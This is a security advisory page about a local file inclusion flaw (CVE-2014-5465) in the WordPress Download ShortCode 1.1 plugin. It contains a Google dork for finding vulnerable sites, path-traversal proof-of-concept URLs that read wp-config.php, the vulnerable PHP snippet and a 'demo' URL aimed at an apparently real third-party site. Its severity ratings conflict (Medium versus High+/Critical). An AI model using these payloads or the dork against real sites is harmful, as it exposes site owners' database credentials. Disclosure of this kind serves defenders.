WordPress ShortCode 1.1 Local File Inclusion

2014.08.28
Credit: Mehdi & Chris
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

################################################################################################# # # Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability # Severity : High+/Critical # Reporter(s) : Mehdi Karout & Christian Galeone # Google Dork : inurl:wp/wp-content/force-download.php # Plugin Version : 1.1 # Plugin Name : Download ShortCode # Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip # Vendor Home : http://werdswords.com/ # Date : 25/08/2014 # Tested in : Win7 - Kali Linux # CVE : CVE-2014-5465 # ################################################################################################## # # PoC : # # # http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File] # # http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php # # Exploit Code : # # $file = $_GET['file']; # if(isset($file)) # { # include("pages/$file"); # } # else # { # include("index.php"); # } # # Demo : # # http://llyndXmoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php # ##################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top